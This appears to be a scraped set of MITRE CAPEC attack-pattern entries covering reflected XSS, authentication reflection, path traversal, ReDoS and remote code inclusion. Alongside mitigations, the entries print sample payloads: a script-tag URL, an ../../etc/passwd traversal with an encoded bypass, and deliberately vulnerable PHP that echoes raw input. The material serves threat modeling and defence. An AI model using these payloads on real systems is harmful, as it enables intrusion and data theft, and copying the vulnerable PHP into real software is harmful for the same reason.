2018-07-31 (Version 2.12)	Updated Attack_Phases, Description, Description Summary, References, Related_Weaknesses
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Attack_Patterns, Related_Weaknesses
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Taxonomy_Mappings
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated References
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Related_Attack_Patterns, Taxonomy_Mappings
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Execution_Flow
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Related_Attack_Patterns

CAPEC-591: Reflected XSS

Attack Pattern ID: 591

Abstraction: Detailed

View customized information:

Description

Extended Description

The most common method of this is through a phishing email where the adversary embeds the malicious script with a URL that the victim then clicks on. In processing the subsequent request, the vulnerable web application incorrectly considers the malicious script as valid input and uses it to creates a reposnse that is then sent back to the victim. To launch a successful Reflected XSS attack, an adversary looks for places where user-input is used directly in the generation of a response. This often involves elements that are not expected to host scripts such as image tags (<img>), or the addition of event attibutes such as onload and onmouseover. These elements are often not subject to the same input validation, output encoding, and other content filtering and checking routines.

Likelihood Of Attack

High

Typical Severity

Very High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	63	Cross-Site Scripting (XSS)
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	18	XSS Targeting Non-Script Elements
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	32	XSS Through HTTP Query Strings
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	86	XSS Through HTTP Headers
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	198	XSS Targeting Error Pages
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	199	XSS Using Alternate Syntax
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	243	XSS Targeting HTML Attributes
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	244	XSS Targeting URI Placeholders
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	245	XSS Using Doubled Characters
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	247	XSS Using Invalid Characters

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Inject Unexpected Items

Execution Flow

Explore

Techniques
Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.
Use a proxy tool to record all links visited during a manual traversal of the web application.
Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.

Experiment

Probe identified potential entry points for reflected XSS vulnerability: The adversary uses the entry points gathered in the "Explore" phase as a target list and injects various common script payloads and special characters to determine if an entry point actually represents a vulnerability and to characterize the extent to which the vulnerability can be exploited.

Techniques
Use a list of XSS probe strings to inject script in parameters of known URLs. If possible, the probe strings contain a unique identifier.
Use a proxy tool to record results of manual input of XSS probes in known URLs.
Use a list of HTML special characters to inject into parameters of known URLs and check if they were properly encoded, replaced, or filtered out.

Craft malicious XSS URL: Once the adversary has determined which parameters are vulnerable to XSS, they will craft a malicious URL containing the XSS exploit. The adversary can have many goals, from stealing session IDs, cookies, credentials, and page content from the victim.
Techniques
Change a URL parameter to include a malicious script tag.
Send information gathered from the malicious script to a remote endpoint.

Exploit

Get victim to click URL: In order for the attack to be successful, the victim needs to access the malicious URL.

Techniques
Send a phishing email to the victim containing the malicious URL. This can be hidden in a hyperlink as to not show the full URL, which might draw suspicion.
Put the malicious URL on a public forum, where many victims might accidentally click the link.

Prerequisites

An application that leverages a client-side web browser with scripting enabled.

An application that fail to adequately sanitize or encode untrusted input.

Skills Required

[Level: Medium]

Requires the ability to write malicious scripts and embed them into HTTP requests.

Resources Required

None: No specialized resources are required to execute this type of attack.

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data
Confidentiality Authorization Access Control	Gain Privileges
Confidentiality Integrity Availability	Execute Unauthorized Commands
Integrity	Modify Data

Mitigations

Use browser technologies that do not allow client-side scripting.

Utilize strict type, character, and encoding enforcement.

Ensure that all user-supplied input is validated before use.

Example Instances

Consider a web application that enables or disables some of the fields of a form on the page via the use of a mode parameter provided on the query string.

http://my.site.com/aform.html?mode=full

The application’s server-side code may want to display this mode value in the HTML page being created to give the users an understanding of what mode they are in. In this example, PHP is used to pull the value from the URL and generate the desired HTML.

<?php
echo 'Mode is: ' . $_GET["mode"];
?>

http://my.site.com/aform.html?mode=<script>alert('hi');</script>

Reflected XSS attacks can take advantage of HTTP headers to compromise a victim. For example, assume a vulnerable web application called ‘mysite’ dynamically generates a link using an HTTP header such as HTTP_REFERER. Code somewhere in the application could look like:

<?php
echo "<a href="$_SERVER['HTTP_REFERER']">Test URL</a>"
?>

The HTTP_REFERER header is populated with the URI that linked to the currently executing page. A web site can be created and hosted by an adversary that takes advantage of this by adding a reference to the vulnerable web application. By tricking a victim into clicking a link that executes the attacker’s web page, such as:

"http://attackerswebsite.com?<script>malicious content</script>"

The vulnerable web application ('mysite') is now called via the attacker's web site, initiated by the victim's web browser. The HTTP_REFERER header will contain a malicious script, which is embedded into the page by the vulnerable application and served to the victim. The victim’s web browser then executes the injected script, thus compromising the victim’s machine.

Related Weaknesses

CWE-ID	Weakness Name
79	Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

References

[REF-476] Watchfire Research. "XSS vulnerabilities in Google.com". Full Disclosure mailing list archives. <http://seclists.org/fulldisclosure/2005/Dec/1107>.

[REF-604] "OWASP Web Security Testing Guide". Testing for Reflected Cross Site Scripting. The Open Web Application Security Project (OWASP). <https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/01-Testing_for_Reflected_Cross_Site_Scripting.html>.

Content History

Submissions
Submission Date	Submitter	Organization
2017-04-15 (Version 2.9)	CAPEC Content Team	The MITRE Corporation
2017-04-15 (Version 2.9)
Modifications
Modification Date	Modifier	Organization
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Resources_Required
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Description, Example_Instances
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated References
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Execution_Flow, Extended_Description
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Example_Instances

CAPEC-90: Reflection Attack in Authentication Protocol

Attack Pattern ID: 90

Abstraction: Standard

View customized information:

Description

Likelihood Of Attack

High

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	114	Authentication Abuse
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	272	Protocol Manipulation

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Communications
Mechanisms of Attack	Abuse Existing Functionality, Subvert Access Control

Execution Flow

Explore

Identify service with vulnerable handshake authentication: The adversary must first identify a vulnerable authentication protocol. The most common indication of an authentication protocol vulnerable to reflection attack is when the client initiates the handshake, rather than the server. This allows the client to get the server to encrypt targeted data using the server's pre-shared key.

Experiment

Send challenge to target server: The adversary opens a connection to the target server and sends it a challenge. This challenge is arbitrary and is simply used as a placeholder for the protocol in order to get the server to respond.
Receive server challenge: The server responds by returning the challenge sent encrypted with the server's pre-shared key, as well as its own challenge to the attacker sent in plaintext. We will call this challenge sent by the server "C". C is very important and is stored off by the adversary for the next step.
Initiate second handshake: Since the adversary does not possess the pre-shared key, they cannot encrypt C from the previous step in order for the server to authenticate them. To get around this, the adversary initiates a second connection to the server while still keeping the first connection alive. In the second connection, the adversary sends C as the initial client challenge, which rather than being arbitary like the first connection, is very intentional.
Receive encrypted challenge: The server treats the intial client challenge in connection two as an arbitrary client challenge and responds by encrypting C with the pre-shared key. The server also sends a new challenge. The adversary ignores the server challenge and stores the encrypted version of C. The second connection is either terminated or left to expire by the adversary as it is no longer needed.

Exploit

The adversary now posseses the encrypted version of C that is obtained through connection two. The adversary continues the handshake in connection one by responding to the server with the encrypted version of C, verifying that they have access to the pre-shared key (when they actually do not). Because the server uses the same pre-shared key for all authentication it will decrypt C and authenticate the adversary for the first connection, giving the adversary illegitimate access to the target system.

Prerequisites

The attacker must have direct access to the target server in order to successfully mount a reflection attack. An intermediate entity, such as a router or proxy, that handles these exchanges on behalf of the attacker inhibits the attackers' ability to attack the authentication protocol.

Skills Required

[Level: Medium]

The attacker needs to have knowledge of observing the protocol exchange and managing the required connections in order to issue and respond to challenges

Resources Required

All that the attacker requires is a means to observe and understand the protocol exchanges in order to reflect the challenges appropriately.

Consequences

Scope	Impact	Likelihood
Confidentiality Access Control Authorization	Gain Privileges Bypass Protection Mechanism
Confidentiality	Read Data

Mitigations

The server must initiate the handshake by issuing the challenge. This ensures that the client has to respond before the exchange can move any further

The use of HMAC to hash the response from the server can also be used to thwart reflection. The server responds by returning its own challenge as well as hashing the client's challenge, its own challenge and the pre-shared secret. Requiring the client to respond with the HMAC of the two challenges ensures that only the possessor of a valid pre-shared secret can successfully hash in the two values.

Introducing a random nonce with each new connection ensures that the attacker cannot employ two connections to attack the authentication protocol

Example Instances

A single sign-on solution for a network uses a fixed pre-shared key with its clients to initiate the sign-on process in order to avoid eavesdropping on the initial exchanges.

An attacker can use a reflection attack to mimic a trusted client on the network to participate in the sign-on exchange.

Related Weaknesses

CWE-ID	Weakness Name
301	Reflection Attack in an Authentication Protocol
303	Incorrect Implementation of Authentication Algorithm

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent, )

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated Related_Attack_Patterns
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated @Abstraction, Related_Attack_Patterns
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Execution_Flow, Related_Attack_Patterns
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Related_Attack_Patterns
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Related_Weaknesses
2021-10-21 (Version 3.6)	CAPEC Content Team	The MITRE Corporation
2021-10-21 (Version 3.6)	Updated Description, Execution_Flow

CAPEC-138: Reflection Injection

Attack Pattern ID: 138

Abstraction: Standard

View customized information:

Description

Typical Severity

Very High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	137	Parameter Injection

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Inject Unexpected Items

Prerequisites

The target application must utilize reflection libraries and allow users to directly control the parameters to these methods. If the adversary can host classes where the target can invoke them, more powerful variants of this attack are possible.

Resources Required

None: No specialized resources are required to execute this type of attack.

Related Weaknesses

CWE-ID	Weakness Name
470	Use of Externally-Controlled Input to Select Classes or Code ('Unsafe Reflection')

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Attack_Prerequisites, Description Summary, Resources_Required
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Prerequisites
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns
2023-01-24 (Version 3.9)	CAPEC Content Team	The MITRE Corporation
2023-01-24 (Version 3.9)	Updated Related_Weaknesses

CAPEC-492: Regular Expression Exponential Blowup

Attack Pattern ID: 492

Abstraction: Standard

View customized information:

Description

Extended Description

The algorithm builds a finite state machine and based on the input transitions through all the states until the end of the input is reached. NFA engines may evaluate each character in the input string multiple times during the backtracking. The algorithm tries each path through the NFA one by one until a match is found; the malicious input is crafted so every path is tried which results in a failure. Exploitation of the Regex results in programs hanging or taking a very long time to complete. These attacks may target various layers of the Internet due to regular expressions being used in validation.

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	130	Excessive Allocation

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Abuse Existing Functionality

Prerequisites

This type of an attack requires the ability to identify hosts running a poorly implemented Regex, and the ability to send crafted input to exploit the regular expression.

Mitigations

Test custom written Regex with fuzzing to determine if the Regex is a poor one. Add timeouts to processes that handle the Regex logic. If an evil Regex is found rewrite it as a good Regex.

Related Weaknesses

CWE-ID	Weakness Name
400	Uncontrolled Resource Consumption
1333	Inefficient Regular Expression Complexity

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent)

Relevant to the OWASP taxonomy mapping

Entry Name
Regular expression Denial of Service - ReDoS

References

[REF-421] Bryan Sullivan. "Regular Expression Denial of Service Attacks and Defenses". <http://msdn.microsoft.com/en-au/magazine/ff646973.aspx>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Taxonomy_Mappings
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Related_Weaknesses
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Extended_Description

CAPEC-139: Relative Path Traversal

Attack Pattern ID: 139

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

High

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	126	Path Traversal

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Manipulate Data Structures

Execution Flow

Explore

Fingerprinting of the operating system: In order to perform a valid path traversal, the adversary needs to know what the underlying OS is so that the proper file seperator is used.

Techniques
Port mapping. Identify ports that the system is listening on, and attempt to identify inputs and protocol types on those ports.
TCP/IP Fingerprinting. The adversary uses various software to make connections or partial connections and observe idiosyncratic responses from the operating system. Using those responses, they attempt to guess the actual operating system.
Induce errors to find informative error messages

Survey application: Using manual or automated means, an adversary will survey the target application looking for all areas where user input is taken to specify a file name or path.

Techniques
Use a spidering tool to follow and record all links on a web page. Make special note of any links that include parameters in the URL.
Use a proxy tool to record all links visited during a manual traversal of a web application. Make special note of any links that include parameters in the URL. Manual traversal of this type is frequently necessary to identify forms that are GET method forms rather than POST forms.
Use a browser to manually explore a website and analyze how it is constructed. Many browser plug-ins are available to facilitate the analysis or automate the URL discovery.

Experiment

Attempt variations on input parameters: Using manual or automated means, an adversary attempts varying relative file path combinations on all found user input locations and observes the responses.

Techniques
Provide "../" or "..\" at the beginning of any filename to traverse to the parent directory
Use a list of probe strings as path traversal payload. Different strings may be used for different platforms. Strings contain relative path sequences such as "../".
Use a proxy tool to record results of manual input of relative path traversal probes in known URLs.

Exploit

Access, modify, or execute arbitrary files.: An adversary injects path traversal syntax into identified vulnerable inputs to cause inappropriate reading, writing or execution of files. An adversary could be able to read directories or files which they are normally not allowed to read. The adversary could also access data outside the web document root, or include scripts, source code and other kinds of files from external websites. Once the adversary accesses arbitrary files, they could also modify files. In particular situations, the adversary could also execute arbitrary code or system commands.
Techniques
Manipulate file and its path by injecting relative path sequences (e.g. "../").
Download files, modify files, or try to execute shell commands (with binary files).

Prerequisites

The target application must accept a string as user input, fail to sanitize combinations of characters in the input that have a special meaning in the context of path navigation, and insert the user-supplied string into path navigation commands.

Skills Required

[Level: Low]

To inject the malicious payload in a web page

[Level: High]

To bypass non trivial filters in the application

Consequences

Scope	Impact	Likelihood
Integrity	Modify Data
Confidentiality	Read Data
Confidentiality Integrity Availability	Execute Unauthorized Commands
Access Control	Bypass Protection Mechanism
Availability	Unreliable Execution

Mitigations

Design: Input validation. Assume that user inputs are malicious. Utilize strict type, character, and encoding enforcement

Implementation: Perform input validation for all remote content, including remote and user-generated content.

Implementation: Prefer working without user input when using file system calls

Implementation: Use indirect references rather than actual file names.

Implementation: Use possible permissions on file access when developing and deploying web applications.

Example Instances

The attacker uses relative path traversal to access files in the application. This is an example of accessing user's password file.

http://www.example.com/getProfile.jsp?filename=../../../../etc/passwd

Then an attacker creates special payloads to bypass this filter:

http://www.example.com/getProfile.jsp?filename=%2e%2e/%2e%2e/%2e%2e/%2e%2e /etc/passwd

When the application gets this input string, it will be the desired vector by the attacker.

Related Weaknesses

CWE-ID	Weakness Name
23	Relative Path Traversal

References

[REF-10] "WASC Threat Classification 2.0". WASC-33 - Path Traversal. The Web Application Security Consortium (WASC). 2010. <http://projects.webappsec.org/w/page/13246952/Path-Traversal>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated Attack_Phases
2015-12-07 (Version 2.8)	CAPEC Content Team	The MITRE Corporation
2015-12-07 (Version 2.8)	Updated Attack_Phases
2017-01-09 (Version 2.9)	CAPEC Content Team	The MITRE Corporation
2017-01-09 (Version 2.9)	Updated Attack_Phases, Related_Weaknesses
2017-05-01 (Version 2.10)	CAPEC Content Team	The MITRE Corporation
2017-05-01 (Version 2.10)	Updated Attack_Phases
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Attack_Phases
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attack_Motivation-Consequences, Attack_Phases
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Consequences
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Execution_Flow, Mitigations
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated References
2021-10-21 (Version 3.6)	CAPEC Content Team	The MITRE Corporation
2021-10-21 (Version 3.6)	Updated Execution_Flow
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Example_Instances

CAPEC-253: Remote Code Inclusion

Attack Pattern ID: 253

Abstraction: Standard

View customized information:

Description

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	175	Code Inclusion
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	101	Server Side Include (SSI) Injection
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	193	PHP Remote File Inclusion
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	500	WebView Injection
CanPrecede	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	664	Server Side Request Forgery

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Inject Unexpected Items

Prerequisites

Target application server must allow remote files to be included.The malicious file must be placed on the remote machine previously.

Mitigations

Minimize attacks by input validation and sanitization of any user data that will be used by the target application to locate a remote file to be included.

Related Weaknesses

CWE-ID	Weakness Name
829	Inclusion of Functionality from Untrusted Control Sphere

Taxonomy Mappings

Relevant to the WASC taxonomy mapping

Entry ID	Entry Name
05	Remote File Inclusion

References

[REF-614] "OWASP Web Security Testing Guide". Testing for Remote File Inclusion. The Open Web Application Security Project (OWASP). <https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.2-Testing_for_Remote_File_Inclusion.html>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attack_Prerequisites, Description Summary, Related_Weaknesses, Solutions_and_Mitigations
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated References, Taxonomy_Mappings
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Related_Attack_Patterns

CAPEC-555: Remote Services with Stolen Credentials

Attack Pattern ID: 555

Abstraction: Standard

View customized information:

Description

Typical Severity

Very High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	560	Use of Known Domain Credentials
CanPrecede	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	151	Identity Spoofing
CanPrecede	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	270	Modification of Registry Run Keys

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Subvert Access Control

Mitigations

Disable RDP, telnet, SSH and enable firewall rules to block such traffic. Limit users and accounts that have remote interactive login access. Remove the Local Administrators group from the list of groups allowed to login through RDP. Limit remote user permissions. Use remote desktop gateways and multifactor authentication for remote logins.

Example Instances

Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS). There are other implementations and third-party tools that provide graphical access Remote Services similar to RDS. Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials.

Windows Remote Management (WinRM) is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services). It may be called with the winrm command or by any number of programs such as PowerShell.

Related Weaknesses

CWE-ID	Weakness Name
522	Insufficiently Protected Credentials
308	Use of Single-factor Authentication
309	Use of Password System for Primary Authentication
294	Authentication Bypass by Capture-replay
263	Password Aging with Long Expiration
262	Not Using Password Aging
521	Weak Password Requirements

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1021	Remote Services
1114.002	Email Collection:Remote Email Collection
1133	External Remote Services

Content History

Submissions
Submission Date	Submitter	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)
Modifications
